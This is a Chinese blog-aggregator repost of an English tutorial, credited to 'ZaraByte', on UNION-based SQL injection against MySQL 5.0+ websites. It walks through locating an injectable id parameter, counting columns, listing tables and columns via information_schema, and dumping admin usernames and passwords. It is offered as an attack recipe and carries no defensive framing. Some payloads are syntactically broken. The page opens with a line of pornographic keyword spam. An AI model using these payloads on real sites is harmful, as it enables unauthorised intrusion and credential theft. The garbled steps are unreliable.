日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

mysql注入5.0以上_[Injection]对MYSQL 5.0服务器以上版本注入

發布時間:2023/12/20 数据库 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 mysql注入5.0以上_[Injection]对MYSQL 5.0服务器以上版本注入 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

How to do a SQL Injection for MYSQL Server 5.0+

1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error

2. order by #–

Keep upping the # until you get an error.

3. union all select 1,#,#,#,#,#–

Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them

4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2

5. concat_ws(0×3A,version(),@@version) in vulnerable column

add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version

Will show the version of the SQL Server recommended that it be 5.0

6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–

This selects all the the tables from the database.

7. Find a table your after like admin or like users or user whatever table you wanna see

8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–

Replace x with the ASCII of table name You will need to convert Text to ASCII.

9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–

Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after

so for example say you found a table named admin and you wanna see the username and password columns you’d do

union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–

Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them down in displaying, be sure to change the table_name to the name of the table so say your going for admin change the table_name– to admin–

after that you will either get the username and password in plain text or it will be hashed.

just so you know change the # signs to the ammount of rows you get in Step 3 if you have 2 rows it should be 1,2 or you have 5 rows it should be 1,2,3,4,5 and so on.

Side note may need to add a – between like the thefilename.php?id=-#

So if a website has 5 rows you’d add all 5 rows the last number don’t add a “,”

Unfinished Tutorial Wrote by ZaraByte

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的mysql注入5.0以上_[Injection]对MYSQL 5.0服务器以上版本注入的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。